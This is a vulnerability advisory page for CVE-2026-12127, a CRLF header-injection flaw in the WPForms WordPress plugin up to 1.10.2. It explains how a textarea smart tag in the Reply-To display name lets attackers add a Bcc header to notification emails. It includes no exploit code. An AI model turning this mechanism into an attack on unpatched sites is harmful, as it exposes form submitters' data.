CVE-2026-12127
Received Received - Intake

CRLF Injection in WPForms WordPress Plugin

Vulnerability report for CVE-2026-12127, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: Wordfence

Description

The WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 1.10.2 This is due to `get_reply_to_address()` processing the Reply-To display name through smart-tag expansion with context `'notification'` instead of `'notification-reply-to'`, which bypasses email-address validation while `wpforms_sanitize_textarea_field()` intentionally preserves CR/LF characters that are never stripped before the display name is concatenated into the raw `Reply-To:` mail header string. This makes it possible for unauthenticated attackers to inject arbitrary additional email headers β€” such as `Bcc:` β€” into outgoing notification emails, silently blind-copying all notification email copies to an attacker-controlled address. Exploitation requires that a form notification is configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-01
Last Modified
2026-07-01
Generated
2026-07-01
AI Q&A
2026-07-01
EPSS Evaluated
N/A
NVD
EUVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
wpforms easy_form_builder to 1.10.2 (inc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-93 The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

The WPForms plugin for WordPress is vulnerable to a CRLF Injection vulnerability in all versions up to and including 1.10.2. This occurs because the function get_reply_to_address() processes the Reply-To display name using smart-tag expansion with an incorrect context, bypassing email-address validation. Additionally, the sanitization function preserves CR and LF characters, which are not removed before the display name is added to the raw Reply-To email header. This allows unauthenticated attackers to inject additional email headers, such as Bcc, into outgoing notification emails.

Exploitation requires that a form notification is configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag.

Impact Analysis

This vulnerability allows unauthenticated attackers to inject arbitrary additional email headers into outgoing notification emails. For example, attackers can add a Bcc header to silently blind-copy all notification emails to an attacker-controlled address. This can lead to unauthorized disclosure of sensitive information contained in those emails.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-12127. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart